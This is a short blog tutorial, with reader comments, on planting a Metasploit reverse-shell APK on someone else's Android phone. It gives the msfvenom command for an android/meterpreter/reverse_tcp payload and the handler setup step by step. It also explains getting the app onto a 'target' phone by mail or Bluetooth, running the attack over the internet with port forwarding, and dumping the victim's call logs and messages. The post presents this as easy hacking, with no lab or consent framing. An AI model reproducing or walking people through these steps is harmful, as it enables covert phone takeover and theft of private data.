Let’s Hack android with metasploit in Kali Linux – It’s very
easy
Open your terminals and type in-
Msfvenom –p
android/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 R > filename.apk
This will create an apk file in Home
directory.
• -p => Specify
Payload
• LHOST => Your IP or DDNS
• LPORT => Port you want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File
• LHOST => Your IP or DDNS
• LPORT => Port you want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File
There will be some error about
architecture but its ok, let it be.
Easy As That
Now the apk should be on target phone. Mail it or send it to the
target by Bluetooth or share it or something like that.
Now before running that app on your target android phone, you
have to start a handler.
You can do that using – type in
1.
Msfconsole (opens up metasploit)
2.
use exploit/multi/handler
3.
set payload android/meterpreter/reverse_tcp
4.
set LHOST (your ip)
5.
set LPORT 4444
6.
exploit
Now run the app on your android phone and you'll get a
meterpreter session opened!!
Now you can dump data like phone logs, messages etc…
Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.
Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.
Faq
1) HOW TO HACK ON WAN (NOT ON YOUR OWN
WIFI/NETWORK)
It's really easy and almost the same.
First you need to get your public IP.
You also need your private ip. Use ifconfig command in terminal to get that.
Now there are just two small changes in the above steps
First you need to get your public IP.
You also need your private ip. Use ifconfig command in terminal to get that.
Now there are just two small changes in the above steps
i) In the msfvenom command, in LHOST, you need to enter your
'PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'
ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'
That's IT
NOTE – You Need to Port forward The
Port you used in your modem/router or it won't work.
2) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please
recheck the command you entered, if it’s correct, recheck again!!
3) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google
store!!
4) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may
give error.
5) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if
possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If there’s any other problem, type in the comment!! I'll try my
best to help!
I made a set of Metasploit Tutorials from the beginning
HI there , i tried this but when the .apk file opend at the victim side on the android no session started at mine , what that means ? ,, you may contact me at mi_ah_010@yahoo.com or here , thank you for your great posts as well
ReplyDeletewhat is the error you are getting ? can you send me a screenshot mate ?
ReplyDeleteSame problem I am facing my meterpreter seasion is not starting. I am using vmware and allow all permission to android app manually.
ReplyDelete